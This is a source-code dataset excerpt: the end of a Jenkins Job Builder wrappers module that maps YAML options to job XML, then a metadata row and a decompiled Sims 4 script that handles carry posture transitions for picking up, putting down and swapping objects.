    :arg bool black-duck-run-checks: Automatic Black Duck Code Center
        compliance checks will occur after the build completes
        (default false)
    :arg bool black-duck-include-published-artifacts: Include the build's
        published module artifacts in the license violation checks if they
        are also used as dependencies for other modules in this build
        (default false)
    :arg bool auto-create-missing-component-requests: Auto create
        missing components in Black Duck Code Center application after
        the build is completed and deployed in Artifactory
        (default true)
    :arg bool auto-discard-stale-component-requests: Auto discard
        stale components in Black Duck Code Center application after
        the build is completed and deployed in Artifactory
        (default true)
    :arg bool deploy-artifacts: Push artifacts to the Artifactory
        Server. The specific artifacts to push are controlled using
        the deployment-include-patterns and deployment-exclude-patterns.
        (default true)
    :arg list deployment-include-patterns: List of patterns for including
        build artifacts to publish to artifactory. (default [])
    :arg list deployment-exclude-patterns: List of patterns
        for excluding artifacts from deployment to Artifactory
        (default [])
    :arg bool env-vars-include: Include environment variables
        accessible by the build process. Jenkins-specific env variables
        are always included. Environment variables can be filtered using
        the env-vars-include-patterns and env-vars-exclude-patterns.
        (default false)
    :arg list env-vars-include-patterns: List of environment variable patterns
        that will be included as part of the published build info. Environment
        variables may contain the * and the ? wildcards (default [])
    :arg list env-vars-exclude-patterns: List of environment variable patterns
        that will be excluded from the published build info
        (default [])

    Example:

    .. literalinclude:: /../../tests/wrappers/fixtures/artifactory003.yaml
       :language: yaml

    """
    artifactory = XML.SubElement(
        xml_parent,
        'org.jfrog.hudson.maven3.ArtifactoryMaven3Configurator')
    # details
    details = XML.SubElement(artifactory, 'details')
    artifactory_common_details(details, data)
    deploy_release = XML.SubElement(details, 'deployReleaseRepository')
    artifactory_repository(deploy_release, data, 'release')
    deploy_snapshot = XML.SubElement(details, 'deploySnapshotRepository')
    artifactory_repository(deploy_snapshot, data, 'snapshot')
    XML.SubElement(details, 'stagingPlugin').text = data.get(
        'resolve-staging-plugin', '')
    # resolverDetails
    resolver = XML.SubElement(artifactory, 'resolverDetails')
    artifactory_common_details(resolver, data)
    resolve_snapshot = XML.SubElement(resolver, 'resolveSnapshotRepository')
    artifactory_repository(resolve_snapshot, data, 'snapshot')
    # NOTE(review): 'deploy_release' is reused here for the *resolve*
    # release repository element; the name is historical, the XML tag is
    # correct.
    deploy_release = XML.SubElement(resolver, 'resolveReleaseRepository')
    artifactory_repository(deploy_release, data, 'release')
    XML.SubElement(resolver, 'stagingPlugin').text = data.get(
        'resolve-staging-plugin', '')
    # artifactDeploymentPatterns
    artifactory_deployment_patterns(artifactory, data)
    # envVarsPatterns
    artifactory_env_vars_patterns(artifactory, data)
    XML.SubElement(artifactory, 'matrixParams').text = ','.join(
        data.get('matrix-params', []))
    # optional__props
    artifactory_optional_props(artifactory, data, 'wrappers')
def maven_release(registry, xml_parent, data):
    """yaml: maven-release
    Wrapper for Maven projects
    Requires :jenkins-wiki:`M2 Release Plugin <M2+Release+Plugin>`

    :arg str release-goals: Release goals and options (default '')
    :arg str dry-run-goals: DryRun goals and options (default '')
    :arg int num-successful-builds: Number of successful release builds to
        keep (default 1)
    :arg bool select-custom-scm-comment-prefix: Preselect 'Specify custom SCM
        comment prefix' (default false)
    :arg bool select-append-jenkins-username: Preselect 'Append Jenkins
        Username' (default false)
    :arg bool select-scm-credentials: Preselect 'Specify SCM login/password'
        (default false)
    :arg str release-env-var: Release environment variable (default '')
    :arg str scm-user-env-var: SCM username environment variable (default '')
    :arg str scm-password-env-var: SCM password environment variable
        (default '')

    Example:

    .. literalinclude:: /../../tests/wrappers/fixtures/maven-release001.yaml
       :language: yaml

    """
    # Root element understood by the M2 Release plugin.
    wrapper_node = XML.SubElement(
        xml_parent,
        'org.jvnet.hudson.plugins.m2release.M2ReleaseBuildWrapper')
    # (yaml option, XML tag, default) triples for the generic mapper.
    option_mapping = [
        ('release-goals', 'releaseGoals', ''),
        ('dry-run-goals', 'dryRunGoals', ''),
        ('num-successful-builds', 'numberOfReleaseBuildsToKeep', 1),
        ('select-custom-scm-comment-prefix',
         'selectCustomScmCommentPrefix', False),
        ('select-append-jenkins-username',
         'selectAppendHudsonUsername', False),
        ('select-scm-credentials', 'selectScmCredentials', False),
        ('release-env-var', 'releaseEnvVar', ''),
        ('scm-user-env-var', 'scmUserEnvVar', ''),
        ('scm-password-env-var', 'scmPasswordEnvVar', ''),
    ]
    convert_mapping_to_xml(
        wrapper_node, data, option_mapping, fail_required=True)
def version_number(parser, xml_parent, data):
    """yaml: version-number
    Generate a version number for the build using a format string. See the
    wiki page for more detailed descriptions of options.
    Requires the Jenkins :jenkins-wiki:`version number plugin
    <Version+Number+Plugin>`.

    :arg str variable-name: Name of environment variable to assign version
        number to (required)
    :arg str format-string: Format string used to generate version number
        (required)
    :arg str prefix-variable: Variable that contains version number prefix
        (optional)
    :arg bool skip-failed-builds: If the build fails, DO NOT increment any
        auto-incrementing component of the version number (default: false)
    :arg bool display-name: Use the version number for the build display
        name (default: false)
    :arg str start-date: The date the project began as a UTC timestamp
        (default 1970-1-1 00:00:00.0 UTC)
    :arg int builds-today: The number of builds that have been executed
        today (optional)
    :arg int builds-this-month: The number of builds that have been executed
        since the start of the month (optional)
    :arg int builds-this-year: The number of builds that have been executed
        since the start of the year (optional)
    :arg int builds-all-time: The number of builds that have been executed
        since the start of the project (optional)

    Example:

    .. literalinclude:: /../../tests/wrappers/fixtures/version-number001.yaml
       :language: yaml

    """
    # Named distinctly so the local does not shadow this function's name.
    builder_node = XML.SubElement(
        xml_parent,
        'org.jvnet.hudson.tools.versionnumber.VersionNumberBuilder')
    # (yaml option, XML tag, default); None marks a required option.
    option_mapping = [
        ('variable-name', 'environmentVariableName', None),
        ('format-string', 'versionNumberString', None),
        ('prefix-variable', 'environmentPrefixVariable', ''),
        ('skip-failed-builds', 'skipFailedBuilds', False),
        ('display-name', 'useAsBuildDisplayName', False),
        ('start-date', 'projectStartDate', '1970-1-1 00:00:00.0 UTC'),
        ('builds-today', 'oBuildsToday', '-1'),
        ('builds-this-month', 'oBuildsThisMonth', '-1'),
        ('builds-this-year', 'oBuildsThisYear', '-1'),
        ('builds-all-time', 'oBuildsAllTime', '-1'),
    ]
    convert_mapping_to_xml(
        builder_node, data, option_mapping, fail_required=True)
def github_pull_request(parser, xml_parent, data):
    """yaml: github-pull-request
    Set GitHub commit status with custom context and message.
    Requires the Jenkins :jenkins-wiki:`GitHub Pull Request Builder Plugin
    <GitHub+pull+request+builder+plugin>`.

    :arg bool show-matrix-status: Only post commit status of parent matrix job
        (default false)
    :arg str status-context: The context to include on PR status comments
        (default '')
    :arg str triggered-status: The status message to set when the build has
        been triggered (default '')
    :arg str started-status: The status message to set when the build has
        been started (default '')
    :arg str status-url: The status URL to set (default '')
    :arg bool status-add-test-results: Add test result one-liner to status
        message (default false)
    :arg list statuses: List of custom statuses on the commit for when a build
        is completed

        :Status:
            * **message** (`str`) -- The message that is appended to a comment
              when a build finishes with the desired build status. If no status
              updates should be made when a build finishes with the indicated
              build status, use "--none--" to alert the trigger. (required)
            * **result** (`str`) -- Build result. Can be one of 'SUCCESS',
              'ERROR' or 'FAILURE'. (required)

    Minimal Example:

    .. literalinclude::
        /../../tests/wrappers/fixtures/github-pull-request-minimal.yaml
       :language: yaml

    Full Example:

    .. literalinclude::
        /../../tests/wrappers/fixtures/github-pull-request-full.yaml
       :language: yaml

    """
    ghprb_node = XML.SubElement(
        xml_parent,
        'org.jenkinsci.plugins.ghprb.upstream.GhprbUpstreamStatus')
    # (yaml option, XML tag, default) triples for the generic mapper.
    option_mapping = [
        ('show-matrix-status', 'showMatrixStatus', False),
        ('status-context', 'commitStatusContext', ''),
        ('triggered-status', 'triggeredStatus', ''),
        ('started-status', 'startedStatus', ''),
        ('status-url', 'statusUrl', ''),
        ('status-add-test-results', 'addTestResults', False),
    ]
    convert_mapping_to_xml(ghprb_node, data, option_mapping,
                           fail_required=True)
    statuses = data.get('statuses', [])
    if not statuses:
        # No custom completion statuses: do not emit a completedStatus node.
        return
    # Keep this order: it is reproduced verbatim in the error message below.
    valid_results = ['ERROR', 'SUCCESS', 'FAILURE']
    status_mapping = [
        ('message', 'message', None),
        ('result', 'result', ''),
    ]
    completed_node = XML.SubElement(ghprb_node, 'completedStatus')
    for status in statuses:
        if status.get('result', '') not in valid_results:
            raise JenkinsJobsException(
                "'result' must be one of: " + ', '.join(valid_results))
        message_node = XML.SubElement(
            completed_node,
            'org.jenkinsci.plugins.ghprb.extensions'
            '.comments.GhprbBuildResultMessage')
        convert_mapping_to_xml(
            message_node, status, status_mapping, fail_required=True)
class Wrappers(jenkins_jobs.modules.base.Base):
    """Job Builder module that renders the ``wrappers`` job section."""

    # Ordering hint used by the module registry when assembling job XML.
    sequence = 80

    component_type = 'wrapper'
    component_list_type = 'wrappers'

    def gen_xml(self, xml_parent, data):
        """Append a <buildWrappers> element and dispatch every configured
        wrapper component into it."""
        container = XML.SubElement(xml_parent, 'buildWrappers')
        for component in data.get('wrappers', []):
            self.registry.dispatch('wrapper', container, component)
| 39.863289 | 80 | 0.635183 |
acf6c217dfb5369e9562fd3b99949739b7a875ab | 30,429 | py | Python | Scripts/simulation/carry/carry_elements.py | velocist/TS4CheatsInfo | b59ea7e5f4bd01d3b3bd7603843d525a9c179867 | [
"Apache-2.0"
] | null | null | null | Scripts/simulation/carry/carry_elements.py | velocist/TS4CheatsInfo | b59ea7e5f4bd01d3b3bd7603843d525a9c179867 | [
"Apache-2.0"
] | null | null | null | Scripts/simulation/carry/carry_elements.py | velocist/TS4CheatsInfo | b59ea7e5f4bd01d3b3bd7603843d525a9c179867 | [
"Apache-2.0"
] | null | null | null | # uncompyle6 version 3.7.4
# Python bytecode 3.7 (3394)
# Decompiled from: Python 3.7.9 (tags/v3.7.9:13c94747c7, Aug 17 2020, 18:58:18) [MSC v.1900 64 bit (AMD64)]
# Embedded file name: T:\InGame\Gameplay\Scripts\Server\carry\carry_elements.py
# Compiled at: 2018-05-18 03:28:16
# Size of source mod 2**32: 44951 bytes
import functools
from animation import ClipEventType
from animation.animation_utils import flush_all_animations, disable_asm_auto_exit
from animation.arb import Arb
from animation.arb_element import distribute_arb_element
from carry.carry_tuning import CarryPostureStaticTuning
from carry.carry_utils import hand_to_track, track_to_hand, SCRIPT_EVENT_ID_START_CARRY, SCRIPT_EVENT_ID_STOP_CARRY
from element_utils import build_element, build_critical_section, must_run, build_critical_section_with_finally
from interactions import ParticipantType, ParticipantTypeSingleSim
from interactions.aop import AffordanceObjectPair
from interactions.context import QueueInsertStrategy, InteractionContext
from postures import PostureTrack
from postures.context import PostureContext
from postures.posture_specs import PostureSpecVariable, PostureOperation, PostureAspectBody, PostureAspectSurface, SURFACE_TARGET_INDEX, SURFACE_SLOT_TYPE_INDEX, SURFACE_INDEX
from postures.transition import PostureTransition
from sims4.log import StackVar
from sims4.tuning.tunable import HasTunableFactory, AutoFactoryInit, HasTunableSingletonFactory, TunableEnumEntry, TunableVariant, TunableFactory, TunableTuple, TunablePackSafeReference
from singletons import DEFAULT
import element_utils, elements, services, sims4.log, sims4.resources
from postures.posture_state import PostureState
logger = sims4.log.Logger('Carry', default_owner='rmccord')
def _create_enter_carry_posture(sim, posture_state, carry_target, track):
    """Build the posture state/aspect needed for *sim* to pick up
    *carry_target* on the given carry *track*.

    Returns a tuple of (new_posture_state, new_posture, new_source_aop,
    var_map). Raises RuntimeError if a valid carry posture spec or aspect
    cannot be produced.
    """
    # Variable map resolving the pick-up: the carried object, the hand
    # (derived from the carry track), and the object's tuned carry posture.
    var_map = {PostureSpecVariable.CARRY_TARGET: carry_target,
               PostureSpecVariable.HAND: track_to_hand(track),
               PostureSpecVariable.POSTURE_TYPE_CARRY_OBJECT: carry_target.get_carry_object_posture()}
    pick_up_operation = PostureOperation.PickUpObject(PostureSpecVariable.POSTURE_TYPE_CARRY_OBJECT, PostureSpecVariable.CARRY_TARGET)
    new_source_aop = pick_up_operation.associated_aop(sim, var_map)
    # Apply the pick-up to the current spec; enter_carry_while_holding=True
    # marks this as an XEVT-driven (mid-animation) carry entry.
    new_posture_spec = pick_up_operation.apply((posture_state.get_posture_spec(var_map)), enter_carry_while_holding=True)
    if new_posture_spec is None:
        raise RuntimeError('[rmccord] Failed to create new_posture_spec in enter_carry_while_holding!')
    new_posture_state = PostureState(sim, posture_state, new_posture_spec, var_map)
    new_posture = new_posture_state.get_aspect(track)
    # Local import — presumably avoids a circular import with carry_postures.
    from carry.carry_postures import CarryingNothing
    if new_posture is None or isinstance(new_posture, CarryingNothing):
        raise RuntimeError('[rmccord] Failed to create a valid new_posture ({}) from new_posture_state ({}) in enter_carry_while_holding!'.format(new_posture, new_posture_state))
    # The carry transition is driven externally by the animation event, not
    # by the normal posture transition sequence.
    new_posture.external_transition = True
    return (
        new_posture_state, new_posture, new_source_aop, var_map)
def enter_carry_while_holding(si, obj=None, carry_obj_participant_type=None, callback=None, create_si_fn=DEFAULT, sim_participant_type=ParticipantType.Actor, target_participant_type=None, owning_affordance=DEFAULT, carry_track_override=None, sequence=None, carry_sim=DEFAULT, track=DEFAULT, asm_context=None, priority_override=None, target_override=None):
    """Build an element that runs *sequence* and, when the animation fires
    its start-carry script event, transitions the sim into a carry posture
    for *obj*.

    The carry entry is XEVT-driven: the enter/exit ARB is appended inside
    the event handler so the pick-up lines up with the clip. After the
    sequence, a PostureTransition is run and an interaction is pushed to
    own the new carry posture.
    """
    sim = si.get_participant(sim_participant_type) if carry_sim is DEFAULT else carry_sim
    if target_override is None:
        target = si.get_participant(target_participant_type) if target_participant_type is not None else None
    else:
        target = target_override
    context = si.context.clone_for_sim(sim, insert_strategy=(QueueInsertStrategy.NEXT))
    if priority_override is not None:
        context.priority = priority_override
    # Carry track resolution order: explicit override, then the SI's tuned
    # carry track; a missing track is a tuning error.
    if carry_track_override is not None:
        track = carry_track_override
    if track is DEFAULT:
        track = si.carry_track
    if track is None:
        raise RuntimeError("[rmccord] enter_carry_while_holding: Interaction {} does not have a carry_track, which means its animation tuning doesn't have a carry target or create target specified in object editor or the posture manifest from the swing graph does not require a specific object. {}".format(si, StackVar(('process',
                                                                                                                                                                                                                                                                                                                       '_auto_constraints'))))
    if create_si_fn is DEFAULT:
        if owning_affordance is None:
            create_si_fn = None
    if create_si_fn is DEFAULT:
        if owning_affordance is DEFAULT:
            raise AssertionError("[rmccord] No create_si_fn was provided and we don't know how to make one.")

        # Default factory: an AOP for the owning affordance targeting the
        # resolved target, reusing the cloned context.
        def create_si_fn():
            context.carry_target = obj
            aop = AffordanceObjectPair(owning_affordance, target, owning_affordance, None)
            return (aop, context)

    def set_up_transition_gen(timeline):
        nonlocal obj
        nonlocal sequence
        if carry_obj_participant_type is not None:
            obj = si.get_participant(carry_obj_participant_type)
        if obj is None:
            raise ValueError('[rmccord] Attempt to perform an enter carry while holding with None as the carried object. SI: {}'.format(si))
        else:
            new_posture_state, new_posture, new_source_aop, var_map = _create_enter_carry_posture(sim, sim.posture_state, obj, track)
            # Carrying a sim requires a linked posture on the carried sim.
            if obj.is_sim:
                target_posture_state = new_posture.set_target_linked_posture_data()
            else:
                target_posture_state = None
            got_callback = False

            def event_handler_enter_carry(event_data):
                # Fired by the clip's start-carry script event; appends the
                # exit-from-old-carry and enter-new-carry ARBs in sync with
                # the animation. Guarded so duplicate events are ignored.
                nonlocal got_callback
                if got_callback:
                    logger.warn('Animation({}) calling to start a carry multiple times', event_data.event_data.get('clip_name'))
                    return
                got_callback = True
                arb = Arb()
                locked_params = new_posture.get_locked_params(None)
                old_carry_posture = sim.posture_state.get_aspect(track)
                if old_carry_posture is not None:
                    old_carry_posture.append_exit_to_arb(arb, new_posture_state, new_posture, var_map)
                new_posture.append_transition_to_arb(arb, old_carry_posture, locked_params=locked_params,
                                                     in_xevt_handler=True)
                distribute_arb_element(arb)

            if asm_context is not None:
                asm_context.register_event_handler(event_handler_enter_carry, handler_type=(ClipEventType.Script), handler_id=SCRIPT_EVENT_ID_START_CARRY, tag='enter_carry')
            else:
                si.store_event_handler(event_handler_enter_carry, handler_id=SCRIPT_EVENT_ID_START_CARRY)

            def maybe_do_transition_gen(timeline):

                def push_si_gen(timeline):
                    # NOTE: this 'context' is a new local that shadows the
                    # outer cloned context.
                    context = InteractionContext(sim, (InteractionContext.SOURCE_POSTURE_GRAPH), (si.priority if priority_override is None else priority_override),
                                                 run_priority=(si.run_priority if priority_override is None else priority_override),
                                                 insert_strategy=(QueueInsertStrategy.FIRST),
                                                 must_run_next=True,
                                                 group_id=(si.group_id))
                    result = new_source_aop.interaction_factory(context)
                    if not result:
                        return result
                    source_interaction = result.interaction
                    new_posture.source_interaction = source_interaction
                    # Try to create an interaction to own the carry posture;
                    # fall back to the original SI owning it.
                    owning_interaction = None
                    if create_si_fn is not None:
                        aop, context = create_si_fn()
                        if aop is not None:
                            if context is not None:
                                if aop.test(context):
                                    result = aop.interaction_factory(context)
                                    if result:
                                        owning_interaction = result.interaction
                    if owning_interaction is None:
                        si.acquire_posture_ownership(new_posture)
                        yield from source_interaction.run_direct_gen(timeline)
                    else:
                        owning_interaction.acquire_posture_ownership(new_posture)
                        aop.execute_interaction(owning_interaction)
                        new_source_aop.execute_interaction(source_interaction)
                    if target_posture_state is not None:
                        yield from new_posture.kickstart_linked_carried_posture_gen(timeline)
                    return result
                    # Unreachable; likely a decompiler artifact.
                    if False:
                        yield None

                def call_callback(_):
                    if callback is not None:
                        callback(new_posture, new_posture.source_interaction)

                # Only transition if the animation actually fired the
                # start-carry event; otherwise the pick-up never happened.
                if got_callback:
                    if target_posture_state is not None:
                        obj.posture_state = target_posture_state
                    result = yield from element_utils.run_child(timeline, must_run([
                        PostureTransition(new_posture, new_posture_state, context, var_map), push_si_gen, call_callback]))
                    return result
                return True
                # Unreachable; likely a decompiler artifact.
                if False:
                    yield None

            sequence = disable_asm_auto_exit(sim, sequence)
            with si.cancel_deferred((si,)):
                yield from element_utils.run_child(timeline, must_run(build_critical_section(build_critical_section(sequence, flush_all_animations), maybe_do_transition_gen)))
        # Unreachable; likely a decompiler artifact.
        if False:
            yield None

    return build_element(set_up_transition_gen)
def _create_exit_carry_posture(sim, target, interaction, use_posture_animations, preserve_posture=None):
    """Build the posture state/transition needed for *sim* to put down
    *target*.

    Returns (old_carry_posture, new_posture, new_posture_state, transition,
    var_map), or a tuple of five Nones on failure. When *preserve_posture*
    is given, that carry aspect is kept in the new state and failure
    logging is suppressed (this is the re-resolve path used mid-sequence).
    """
    failure_result = (None, None, None, None, None)
    slot_manifest = interaction.slot_manifest
    old_carry_posture = sim.posture_state.get_carry_posture(target)
    if old_carry_posture is None:
        return failure_result
    spec_surface = sim.posture_state.spec[SURFACE_INDEX]
    has_slot_surface = spec_surface is not None and spec_surface[SURFACE_SLOT_TYPE_INDEX] is not None
    # NOTE(review): decompiled control flow — as written, a transient target
    # leaves put_down_operation unbound. The original source was presumably
    # 'if not target.transient and has_slot_surface: ... else: ...';
    # verify against the game's bytecode before relying on this branch.
    if not target.transient:
        if has_slot_surface:
            put_down_operation = PostureOperation.PutDownObjectOnSurface(PostureSpecVariable.POSTURE_TYPE_CARRY_NOTHING, spec_surface[SURFACE_TARGET_INDEX], spec_surface[SURFACE_SLOT_TYPE_INDEX], PostureSpecVariable.CARRY_TARGET)
        else:
            put_down_operation = PostureOperation.PutDownObject(PostureSpecVariable.POSTURE_TYPE_CARRY_NOTHING, PostureSpecVariable.CARRY_TARGET)
    var_map = {PostureSpecVariable.CARRY_TARGET: target,
               PostureSpecVariable.HAND: track_to_hand(old_carry_posture.track),
               PostureSpecVariable.POSTURE_TYPE_CARRY_NOTHING: CarryPostureStaticTuning.POSTURE_CARRY_NOTHING,
               PostureSpecVariable.SLOT: slot_manifest,
               PostureSpecVariable.SLOT_TEST_DEFINITION: interaction.create_target}
    current_spec = sim.posture_state.get_posture_spec(var_map)
    # Each failure below warns only on the first attempt (no
    # preserve_posture); the re-resolve path fails silently.
    if current_spec is None:
        if preserve_posture is None:
            logger.warn('Failed to get posture spec for var_map: {} for {}', sim.posture_state, var_map)
        return failure_result
    new_posture_spec = put_down_operation.apply(current_spec)
    if new_posture_spec is None:
        if preserve_posture is None:
            logger.warn('Failed to apply put_down_operation: {}', put_down_operation)
        return failure_result
    if not new_posture_spec.validate_destination((new_posture_spec,), var_map, interaction.affordance, sim):
        if preserve_posture is None:
            logger.warn('Failed to validate put down spec {} with var map {}', new_posture_spec, var_map)
        return failure_result
    carry_posture_overrides = {}
    if preserve_posture is not None:
        carry_posture_overrides[preserve_posture.track] = preserve_posture
    new_posture_state = PostureState(sim, (sim.posture_state), new_posture_spec, var_map, carry_posture_overrides=carry_posture_overrides)
    new_posture = new_posture_state.get_aspect(old_carry_posture.track)
    new_posture.source_interaction = interaction.super_interaction
    # An XEVT-driven put-down (no posture animations) is an external
    # transition; otherwise the posture system animates it.
    new_posture.external_transition = not use_posture_animations
    posture_context = PostureContext(interaction.context.source, interaction.priority, None)
    transition = PostureTransition(new_posture, new_posture_state, posture_context, var_map, locked_params=(interaction.locked_params))
    transition.must_run = True
    return (
        old_carry_posture, new_posture, new_posture_state, transition, var_map)
def exit_carry_while_holding(interaction, callback=None, sequence=None, sim_participant_type=ParticipantType.Actor, use_posture_animations=False, carry_system_target=None, target=DEFAULT, arb=None):
    """Build an element that runs *sequence* and, on the animation's
    stop-carry script event, transitions the sim out of the carry posture
    for *target* (putting the object down).

    When *use_posture_animations* is False the put-down is XEVT-driven;
    otherwise the posture transition plays its own animations. *arb*, if
    given, receives the stop-carry event handler instead of the
    interaction.
    """
    si = interaction.super_interaction
    sim = interaction.get_participant(sim_participant_type)
    # Parses as: (carry_target or target) if target is DEFAULT else target.
    target = interaction.carry_target or interaction.target if target is DEFAULT else target

    def set_up_transition_gen(timeline):
        old_carry_posture, new_posture, _, transition, var_map = _create_exit_carry_posture(sim, target, interaction, use_posture_animations)
        if transition is None:
            # No valid put-down: just run the sequence unchanged.
            yield from element_utils.run_child(timeline, sequence)
            return
        elif arb is None:
            register_event = functools.partial((interaction.store_event_handler), handler_id=SCRIPT_EVENT_ID_STOP_CARRY)
        else:
            register_event = functools.partial((arb.register_event_handler), handler_id=SCRIPT_EVENT_ID_STOP_CARRY)
        exited_carry = False
        if not use_posture_animations:

            def event_handler_exit_carry(event_data):
                # Fired by the clip's stop-carry script event; plays the
                # carry exit in sync with the animation. The local 'arb'
                # deliberately shadows the outer parameter.
                nonlocal exited_carry
                exited_carry = True
                arb = Arb()
                old_carry_posture.append_exit_to_arb(arb, None, new_posture, var_map, exit_while_holding=True)
                new_posture.append_transition_to_arb(arb, old_carry_posture, in_xevt_handler=True)
                distribute_arb_element(arb, master=sim)

            register_event(event_handler_exit_carry)
        if callback is not None:
            register_event(callback)

        def maybe_do_transition(timeline):
            nonlocal transition
            # Re-resolve the put-down after the sequence ran, since the
            # surface/slot situation may have changed; keep the original
            # transition if re-resolution fails.
            _, _, _, new_transition, _ = _create_exit_carry_posture(sim, target, interaction, use_posture_animations, preserve_posture=new_posture)
            if new_transition is not None:
                transition = new_transition
            if not use_posture_animations:
                if not exited_carry:
                    # The animation never fired the stop-carry event; fire
                    # the exit (and callback) manually so state stays sane.
                    event_handler_exit_carry(None)
                    if callback is not None:
                        callback()
            if use_posture_animations or exited_carry:
                interaction_target_was_target = False
                si_target_was_target = False
                # Transient carry targets are about to vanish; detach them
                # from the interactions so the transition can proceed.
                if old_carry_posture.target_is_transient:
                    if interaction.target == target:
                        interaction_target_was_target = True
                        interaction.set_target(None)
                    if si.target == target:
                        si_target_was_target = True
                        si.set_target(None)
                if carry_system_target is not None:
                    old_carry_posture.carry_system_target = carry_system_target

                def do_transition(timeline):
                    result = yield from element_utils.run_child(timeline, transition)
                    if result:
                        if target.is_sim:
                            # After putting down a carried sim, snap the body
                            # posture spec to one with no carry/surface link
                            # (single-sim postures only).
                            body_posture_type = sim.posture_state.spec.body.posture_type
                            if not body_posture_type.multi_sim:
                                post_transition_spec = sim.posture_state.spec.clone(body=(PostureAspectBody((body_posture_type, None))),
                                                                                    surface=(PostureAspectSurface((None, None, None))))
                                post_posture_state = PostureState(sim, sim.posture_state, post_transition_spec, var_map)
                                post_posture_state.body.source_interaction = sim.posture.source_interaction
                                post_transition = PostureTransition(post_posture_state.body, post_posture_state, sim.posture.posture_context, var_map)
                                post_transition.must_run = True
                                yield from element_utils.run_child(timeline, post_transition)
                        # NOTE(review): these rebind *locals* of do_transition;
                        # without a nonlocal declaration they cannot clear the
                        # outer flags read by post_transition. Possibly a
                        # 'nonlocal' lost in decompilation — verify.
                        interaction_target_was_target = False
                        si_target_was_target = False
                        new_posture.source_interaction = None
                        return True
                    return False
                    # Unreachable; likely a decompiler artifact.
                    if False:
                        yield None

                def post_transition(_):
                    # Finally-clause: restore targets and clear the carry
                    # system target whether or not the transition succeeded.
                    if interaction_target_was_target:
                        interaction.set_target(target)
                    if si_target_was_target:
                        si.set_target(target)
                    if carry_system_target is not None:
                        old_carry_posture.carry_system_target = None

                yield from element_utils.run_child(timeline, must_run(build_critical_section_with_finally(do_transition, post_transition)))
            # Unreachable; likely a decompiler artifact.
            if False:
                yield None

        new_sequence = disable_asm_auto_exit(sim, sequence)
        yield from element_utils.run_child(timeline, build_critical_section(build_critical_section(new_sequence, flush_all_animations), maybe_do_transition))
        # Unreachable; likely a decompiler artifact.
        if False:
            yield None

    return build_element(set_up_transition_gen)
def swap_carry_while_holding(interaction, original_carry_target, new_carry_object, callback=None, sequence=None, sim_participant_type=ParticipantType.Actor, carry_system_target=None):
si = interaction.super_interaction
sim = interaction.get_participant(sim_participant_type)
def set_up_transition(timeline):
original_carry_posture, carry_nothing_posture, carry_nothing_posture_state, transition_to_carry_nothing, carry_nothing_var_map = _create_exit_carry_posture(sim, original_carry_target, interaction, False)
if transition_to_carry_nothing is None:
return False
final_posture_state, final_posture, final_source_aop, final_var_map = _create_enter_carry_posture(sim, carry_nothing_posture_state, new_carry_object, original_carry_posture.track)
got_callback = False
def event_handler_swap_carry(event_data):
nonlocal got_callback
if got_callback:
logger.warn('Animation({}) calling to start a carry multiple times', event_data.event_data.get('clip_name'))
return
got_callback = True
arb_exit = Arb()
original_carry_posture.append_exit_to_arb(arb_exit, None, carry_nothing_posture, carry_nothing_var_map, exit_while_holding=True)
carry_nothing_posture.append_transition_to_arb(arb_exit, original_carry_posture, in_xevt_handler=True)
distribute_arb_element(arb_exit)
original_carry_posture.target.transient = True
original_carry_posture.target.clear_parent(sim.transform, sim.routing_surface)
original_carry_posture.target.remove_from_client()
arb_enter = Arb()
locked_params = final_posture.get_locked_params(None)
if carry_nothing_posture is not None:
carry_nothing_posture.append_exit_to_arb(arb_enter, final_posture_state, final_posture, final_var_map)
final_posture.append_transition_to_arb(arb_enter, carry_nothing_posture, locked_params=locked_params,
in_xevt_handler=True)
distribute_arb_element(arb_enter)
interaction.store_event_handler(event_handler_swap_carry, handler_id=SCRIPT_EVENT_ID_START_CARRY)
if callback is not None:
interaction.store_event_handler(callback, handler_id=SCRIPT_EVENT_ID_START_CARRY)
def maybe_do_transition(timeline):
def push_si(_):
context = InteractionContext(sim, (InteractionContext.SOURCE_POSTURE_GRAPH),
(si.priority),
run_priority=(si.run_priority),
insert_strategy=(QueueInsertStrategy.NEXT),
must_run_next=True,
group_id=(si.group_id))
result = final_source_aop.interaction_factory(context)
if not result:
return result
final_source_interaction = result.interaction
si.acquire_posture_ownership(final_posture)
yield from final_source_interaction.run_direct_gen(timeline)
final_posture.source_interaction = final_source_interaction
return result
if False:
yield None
if not got_callback:
event_handler_swap_carry(None)
if callback is not None:
callback()
if got_callback:
if original_carry_posture.target_is_transient:
if interaction.target == original_carry_target:
interaction_target_was_target = True
interaction.set_target(None)
else:
interaction_target_was_target = False
if si.target == original_carry_target:
si_target_was_target = True
si.set_target(None)
else:
si_target_was_target = False
else:
interaction_target_was_target = False
si_target_was_target = False
if carry_system_target is not None:
original_carry_posture.carry_system_target = carry_system_target
def do_transition(timeline):
nonlocal interaction_target_was_target
nonlocal si_target_was_target
result = yield from element_utils.run_child(timeline, transition_to_carry_nothing)
if not result:
return False
interaction_target_was_target = False
si_target_was_target = False
carry_nothing_posture.source_interaction = None
return True
if False:
yield None
def post_transition(_):
if interaction_target_was_target:
interaction.set_target(original_carry_target)
if si_target_was_target:
si.set_target(original_carry_target)
if carry_system_target is not None:
original_carry_posture.carry_system_target = None
exit_carry_result = yield from element_utils.run_child(timeline, must_run(build_critical_section_with_finally(do_transition, post_transition)))
if not exit_carry_result:
raise RuntimeError('[maxr] Failed to exit carry: {}'.format(original_carry_posture))
if got_callback:
context = si.context.clone_for_sim(sim)
yield from element_utils.run_child(timeline, (
PostureTransition(final_posture, final_posture_state, context, final_var_map), push_si))
if False:
yield None
new_sequence = disable_asm_auto_exit(sim, sequence)
yield from element_utils.run_child(timeline, build_critical_section(build_critical_section(new_sequence, flush_all_animations), maybe_do_transition))
if False:
yield None
return (
set_up_transition,)
class EnterCarryWhileHolding(elements.ParentElement, HasTunableFactory, AutoFactoryInit):
class TrackOverrideExplicit(HasTunableSingletonFactory, AutoFactoryInit):
FACTORY_TUNABLES = {'carry_track': TunableEnumEntry(description='\n Which hand to carry the object in.\n ',
tunable_type=PostureTrack,
default=(PostureTrack.RIGHT),
invalid_enums=(
PostureTrack.BODY,))}
def get_override(self, *args, **kwargs):
return self.carry_track
class TrackOverrideHandedness(HasTunableSingletonFactory, AutoFactoryInit):
def get_override(self, interaction, sim_participant, *args, **kwargs):
carry_participant = interaction.get_participant(sim_participant)
if carry_participant is None:
return
hand = carry_participant.get_preferred_hand()
return hand_to_track(hand)
NONE = 1
OBJECT_TO_BE_CARRIED = 2
PARTICIPANT_TYPE = 3
FACTORY_TUNABLES = {'carry_obj_participant_type':TunableEnumEntry(description='\n The object that will be carried.\n ',
